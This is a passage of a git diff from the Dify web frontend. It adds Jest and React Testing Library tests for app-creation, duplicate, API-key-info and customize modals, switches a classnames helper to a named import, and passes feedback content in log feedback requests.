callback: 
() => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + expect(capturedCallback).toBeDefined() + expect(typeof capturedCallback).toBe('function') + + // Simulate ESC key press + capturedCallback?.() + + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when ESC key is pressed and modal is not shown', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + // The callback should still be created but not execute onClose + expect(capturedCallback).toBeDefined() + + // Simulate ESC key press + capturedCallback?.() + + // onClose should not be called because modal is not shown + expect(mockOnClose).not.toHaveBeenCalled() + }) + }) + + describe('Callback Dependencies', () => { + it('should create stable callback reference for ESC key handler', () => { + const { useKeyPress } = require('ahooks') + + render() + + // Verify that useKeyPress was called with a function + const calls = useKeyPress.mock.calls + expect(calls.length).toBeGreaterThan(0) + expect(calls[0][0]).toBe('esc') + expect(typeof calls[0][1]).toBe('function') + }) + }) + + describe('Edge Cases', () => { + it('should handle null props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle undefined props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle rapid show/hide toggles', () => { + // Test initial state + const { unmount } = render() + unmount() + + // Test show state + render() + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Test hide state + render() + // Due to transition animations, we just verify the component handles the prop change + expect(() => render()).not.toThrow() + }) + + it('should handle missing optional onCreateFromBlank prop', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + + it('should work with all required props only', () => { + const requiredProps = { + show: true, + onSuccess: jest.fn(), + onClose: jest.fn(), + } + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-modal/index.tsx b/web/app/components/app/create-app-modal/index.tsx index a449ec8ef2..d74715187f 100644 --- a/web/app/components/app/create-app-modal/index.tsx +++ b/web/app/components/app/create-app-modal/index.tsx @@ -13,7 +13,7 @@ import AppIconPicker from '../../base/app-icon-picker' import type { AppIconSelection } from '../../base/app-icon-picker' import Button from '@/app/components/base/button' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { basePath } from '@/utils/var' import { useAppContext } from '@/context/app-context' import { useProviderContext } from '@/context/provider-context' diff --git a/web/app/components/app/create-from-dsl-modal/index.tsx 
b/web/app/components/app/create-from-dsl-modal/index.tsx index 3564738dfd..0d30a2abac 100644 --- a/web/app/components/app/create-from-dsl-modal/index.tsx +++ b/web/app/components/app/create-from-dsl-modal/index.tsx @@ -25,7 +25,7 @@ import { useProviderContext } from '@/context/provider-context' import AppsFull from '@/app/components/billing/apps-full-in-dialog' import { NEED_REFRESH_APP_LIST_KEY } from '@/config' import { getRedirection } from '@/utils/app-redirection' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { usePluginDependencies } from '@/app/components/workflow/plugin-dependency/hooks' import { noop } from 'lodash-es' import { trackEvent } from '@/app/components/base/amplitude' diff --git a/web/app/components/app/create-from-dsl-modal/uploader.tsx b/web/app/components/app/create-from-dsl-modal/uploader.tsx index b6644da5a4..2745ca84c6 100644 --- a/web/app/components/app/create-from-dsl-modal/uploader.tsx +++ b/web/app/components/app/create-from-dsl-modal/uploader.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { formatFileSize } from '@/utils/format' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Yaml as YamlIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import ActionButton from '@/app/components/base/action-button' diff --git a/web/app/components/app/duplicate-modal/index.spec.tsx b/web/app/components/app/duplicate-modal/index.spec.tsx new file mode 100644 index 0000000000..2d73addeab --- /dev/null +++ b/web/app/components/app/duplicate-modal/index.spec.tsx @@ -0,0 +1,167 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DuplicateAppModal from './index' +import Toast from '@/app/components/base/toast' +import type { ProviderContextState } from '@/context/provider-context' +import { baseProviderContextValue } from '@/context/provider-context' +import { Plan } from '@/app/components/billing/type' + +const appsFullRenderSpy = jest.fn() +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) => { + appsFullRenderSpy(loc) + return
<div data-testid='apps-full'>AppsFull</div>
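// A lightweight stand-in keeps the real billing component out of scope; the spy above records the loc prop each render.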
    + }, +})) + +const useProviderContextMock = jest.fn() +jest.mock('@/context/provider-context', () => { + const actual = jest.requireActual('@/context/provider-context') + return { + ...actual, + useProviderContext: () => useProviderContextMock(), + } +}) + +const renderComponent = (overrides: Partial> = {}) => { + const onConfirm = jest.fn().mockResolvedValue(undefined) + const onHide = jest.fn() + const props: React.ComponentProps = { + appName: 'My App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + show: true, + onConfirm, + onHide, + ...overrides, + } + const utils = render() + return { + ...utils, + onConfirm, + onHide, + } +} + +const setupProviderContext = (overrides: Partial = {}) => { + useProviderContextMock.mockReturnValue({ + ...baseProviderContextValue, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { + ...baseProviderContextValue.plan.usage, + buildApps: 0, + }, + total: { + ...baseProviderContextValue.plan.total, + buildApps: 10, + }, + }, + enableBilling: false, + ...overrides, + } as ProviderContextState) +} + +describe('DuplicateAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + setupProviderContext() + }) + + // Rendering output based on modal visibility. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.duplicateTitle')).toBeInTheDocument() + expect(screen.getByDisplayValue('My App')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.duplicateTitle')).not.toBeInTheDocument() + }) + }) + + // Prop-driven states such as full plan handling. + describe('Props', () => { + it('should disable duplicate button and show apps full content when plan is full', () => { + // Arrange + setupProviderContext({ + enableBilling: true, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { ...baseProviderContextValue.plan.usage, buildApps: 10 }, + total: { ...baseProviderContextValue.plan.total, buildApps: 10 }, + }, + }) + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.duplicate' })).toBeDisabled() + }) + }) + + // User interactions for cancel and confirm flows. 
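// (Toast.notify is spied on with jest.spyOn in these tests, so no toast portal needs to be mounted.)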
+ describe('Interactions', () => { + it('should call onHide when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onHide } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + + it('should show error toast when name is empty', async () => { + const user = userEvent.setup() + const toastSpy = jest.spyOn(Toast, 'notify') + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(toastSpy).toHaveBeenCalledWith({ type: 'error', message: 'explore.appCustomize.nameRequired' }) + expect(onConfirm).not.toHaveBeenCalled() + expect(onHide).not.toHaveBeenCalled() + }) + + it('should submit app info and hide modal when duplicate is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.type(screen.getByRole('textbox'), 'New App') + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(onConfirm).toHaveBeenCalledWith({ + name: 'New App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/duplicate-modal/index.tsx b/web/app/components/app/duplicate-modal/index.tsx index f98fb831ed..f25eb5373d 100644 --- a/web/app/components/app/duplicate-modal/index.tsx +++ b/web/app/components/app/duplicate-modal/index.tsx @@ -3,7 +3,7 @@ import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Modal from '@/app/components/base/modal' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/log-annotation/index.tsx b/web/app/components/app/log-annotation/index.tsx index c0b0854b29..e7c2be3eed 100644 --- a/web/app/components/app/log-annotation/index.tsx +++ b/web/app/components/app/log-annotation/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useMemo } from 'react' import { useTranslation } from 'react-i18next' import { useRouter } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Log from '@/app/components/app/log' import WorkflowLog from '@/app/components/app/workflow-log' import Annotation from '@/app/components/app/annotation' diff --git a/web/app/components/app/log/list.tsx b/web/app/components/app/log/list.tsx index d21d35eeee..e479cbe881 100644 --- a/web/app/components/app/log/list.tsx +++ b/web/app/components/app/log/list.tsx @@ -39,7 +39,7 @@ import Tooltip from '@/app/components/base/tooltip' import CopyIcon from '@/app/components/base/copy-icon' import { buildChatItemTree, getThreadMessages } from '@/app/components/base/chat/utils' import { getProcessedFilesFromResponse } from '@/app/components/base/file-uploader/utils' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' import PromptLogModal from '../../base/prompt-log-modal' import { WorkflowContextProvider } 
from '@/app/components/workflow/context' @@ -816,9 +816,12 @@ const CompletionConversationDetailComp: FC<{ appId?: string; conversationId?: st const { notify } = useContext(ToastContext) const { t } = useTranslation() - const handleFeedback = async (mid: string, { rating }: FeedbackType): Promise => { + const handleFeedback = async (mid: string, { rating, content }: FeedbackType): Promise => { try { - await updateLogMessageFeedbacks({ url: `/apps/${appId}/feedbacks`, body: { message_id: mid, rating } }) + await updateLogMessageFeedbacks({ + url: `/apps/${appId}/feedbacks`, + body: { message_id: mid, rating, content: content ?? undefined }, + }) conversationDetailMutate() notify({ type: 'success', message: t('common.actionMsg.modifiedSuccessfully') }) return true @@ -861,9 +864,12 @@ const ChatConversationDetailComp: FC<{ appId?: string; conversationId?: string } const { notify } = useContext(ToastContext) const { t } = useTranslation() - const handleFeedback = async (mid: string, { rating }: FeedbackType): Promise => { + const handleFeedback = async (mid: string, { rating, content }: FeedbackType): Promise => { try { - await updateLogMessageFeedbacks({ url: `/apps/${appId}/feedbacks`, body: { message_id: mid, rating } }) + await updateLogMessageFeedbacks({ + url: `/apps/${appId}/feedbacks`, + body: { message_id: mid, rating, content: content ?? undefined }, + }) notify({ type: 'success', message: t('common.actionMsg.modifiedSuccessfully') }) return true } diff --git a/web/app/components/app/log/model-info.tsx b/web/app/components/app/log/model-info.tsx index 626ef093e9..b3c4f11be5 100644 --- a/web/app/components/app/log/model-info.tsx +++ b/web/app/components/app/log/model-info.tsx @@ -13,7 +13,7 @@ import { PortalToFollowElemTrigger, } from '@/app/components/base/portal-to-follow-elem' import { useTextGenerationCurrentProviderAndModelAndModelList } from '@/app/components/header/account-setting/model-provider-page/hooks' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const PARAM_MAP = { temperature: 'Temperature', diff --git a/web/app/components/app/log/var-panel.tsx b/web/app/components/app/log/var-panel.tsx index dd8c231a56..8915b3438a 100644 --- a/web/app/components/app/log/var-panel.tsx +++ b/web/app/components/app/log/var-panel.tsx @@ -9,7 +9,7 @@ import { } from '@remixicon/react' import { Variable02 } from '@/app/components/base/icons/src/vender/solid/development' import ImagePreview from '@/app/components/base/image-uploader/image-preview' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { varList: { label: string; value: string }[] diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx new file mode 100644 index 0000000000..1b1e729546 --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -0,0 +1,209 @@ +import type { RenderOptions } from '@testing-library/react' +import { fireEvent, render } from '@testing-library/react' +import { defaultPlan } from '@/app/components/billing/config' +import { noop } from 'lodash-es' +import type { ModalContextState } from '@/context/modal-context' +import APIKeyInfoPanel from './index' + +// Mock the modules before importing the functions +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: 
jest.fn(), +})) + +import { useProviderContext as actualUseProviderContext } from '@/context/provider-context' +import { useModalContext as actualUseModalContext } from '@/context/modal-context' + +// Type casting for mocks +const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction +const mockUseModalContext = actualUseModalContext as jest.MockedFunction + +// Default mock data +const defaultProviderContext = { + modelProviders: [], + refreshModelProviders: noop, + textGenerationModelList: [], + supportRetrievalMethods: [], + isAPIKeySet: false, + plan: defaultPlan, + isFetchedPlan: false, + enableBilling: false, + onPlanInfoChanged: noop, + enableReplaceWebAppLogo: false, + modelLoadBalancingEnabled: false, + datasetOperatorEnabled: false, + enableEducationPlan: false, + isEducationWorkspace: false, + isEducationAccount: false, + allowRefreshEducationVerify: false, + educationAccountExpireAt: null, + isLoadingEducationAccountInfo: false, + isFetchingEducationAccountInfo: false, + webappCopyrightEnabled: false, + licenseLimit: { + workspace_members: { + size: 0, + limit: 0, + }, + }, + refreshLicenseLimit: noop, + isAllowTransferWorkspace: false, + isAllowPublishAsCustomKnowledgePipelineTemplate: false, +} + +const defaultModalContext: ModalContextState = { + setShowAccountSettingModal: noop, + setShowApiBasedExtensionModal: noop, + setShowModerationSettingModal: noop, + setShowExternalDataToolModal: noop, + setShowPricingModal: noop, + setShowAnnotationFullModal: noop, + setShowModelModal: noop, + setShowExternalKnowledgeAPIModal: noop, + setShowModelLoadBalancingModal: noop, + setShowOpeningModal: noop, + setShowUpdatePluginModal: noop, + setShowEducationExpireNoticeModal: noop, + setShowTriggerEventsLimitModal: noop, +} + +export type MockOverrides = { + providerContext?: Partial + modalContext?: Partial +} + +export type APIKeyInfoPanelRenderOptions = { + mockOverrides?: MockOverrides +} & Omit + +// Setup function to configure mocks +export function setupMocks(overrides: MockOverrides = {}) { + mockUseProviderContext.mockReturnValue({ + ...defaultProviderContext, + ...overrides.providerContext, + }) + + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + ...overrides.modalContext, + }) +} + +// Custom render function +export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) { + const { mockOverrides, ...renderOptions } = options + + setupMocks(mockOverrides) + + return render(, renderOptions) +} + +// Helper functions for common test scenarios +export const scenarios = { + // Render with API key not set (default) + withAPIKeyNotSet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: false }, + ...overrides, + }, + }), + + // Render with API key already set + withAPIKeySet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: true }, + ...overrides, + }, + }), + + // Render with mock modal function + withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal }, + ...overrides, + }, + }), +} + +// Common test assertions +export const assertions = { + // Should render main button + shouldRenderMainButton: () => { + const button = document.querySelector('button.btn-primary') + expect(button).toBeInTheDocument() + return button + }, + + // Should not 
render at all + shouldNotRender: (container: HTMLElement) => { + expect(container.firstChild).toBeNull() + }, + + // Should have correct panel styling + shouldHavePanelStyling: (panel: HTMLElement) => { + expect(panel).toHaveClass( + 'border-components-panel-border', + 'bg-components-panel-bg', + 'relative', + 'mb-6', + 'rounded-2xl', + 'border', + 'p-8', + 'shadow-md', + ) + }, + + // Should have close button + shouldHaveCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + expect(closeButton).toBeInTheDocument() + expect(closeButton).toHaveClass('cursor-pointer') + return closeButton + }, +} + +// Common user interactions +export const interactions = { + // Click the main button + clickMainButton: () => { + const button = document.querySelector('button.btn-primary') + if (button) fireEvent.click(button) + return button + }, + + // Click the close button + clickCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + if (closeButton) fireEvent.click(closeButton) + return closeButton + }, +} + +// Text content keys for assertions +export const textKeys = { + selfHost: { + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, + }, + cloud: { + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, + trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + }, +} + +// Setup and cleanup utilities +export function clearAllMocks() { + jest.clearAllMocks() +} + +// Export mock functions for external access +export { mockUseProviderContext, mockUseModalContext, defaultModalContext } diff --git a/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx new file mode 100644 index 0000000000..c7cb061fde --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx @@ -0,0 +1,122 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for Cloud edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: false, // Test Cloud edition +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Cloud Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Cloud Edition Content', () => { + it('should display cloud version title', () => { 
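// i18n is mocked to echo raw keys, so the assertions below match translation keys rather than localized copy.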
+ scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument() + }) + + it('should display emoji for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀') + }) + + it('should display cloud version description', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument() + }) + + it('should not render external link for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument() + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.spec.tsx b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx new file mode 100644 index 0000000000..62eeb4299e --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx @@ -0,0 +1,162 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for CE edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: true, // Test CE edition by default +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Community Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() 
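// Note: shouldRenderMainButton asserts via document.querySelector('button.btn-primary'); prefer screen.getByRole('button') where the accessible name is stable.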
+ }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Content Display', () => { + it('should display self-host title content', () => { + scenarios.withAPIKeyNotSet() + + expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument() + expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument() + }) + + it('should render external link with correct href for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toBeInTheDocument() + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveTextContent(textKeys.selfHost.tryCloud) + }) + + it('should have external link with proper styling for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toHaveClass( + 'mt-2', + 'flex', + 'h-[26px]', + 'items-center', + 'space-x-1', + 'p-1', + 'text-xs', + 'font-medium', + 'text-[#155EEF]', + ) + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('State Management', () => { + it('should start with visible panel (isShow: true)', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should toggle visibility when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Edge Cases', () => { + it('should handle provider context loading state', () => { + scenarios.withAPIKeyNotSet({ + providerContext: { + modelProviders: [], + textGenerationModelList: [], + }, + }) + assertions.shouldRenderMainButton() + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + 
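// getByRole throws on zero or multiple matches, so this assertion also guards against duplicate buttons.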
expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.tsx b/web/app/components/app/overview/apikey-info-panel/index.tsx index b50b0077cb..47fe7af972 100644 --- a/web/app/components/app/overview/apikey-info-panel/index.tsx +++ b/web/app/components/app/overview/apikey-info-panel/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' import { LinkExternal02 } from '@/app/components/base/icons/src/vender/line/general' import { IS_CE_EDITION } from '@/config' diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + 
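// waitFor retries this block until the modal transition finishes and the content becomes queryable.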
expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + 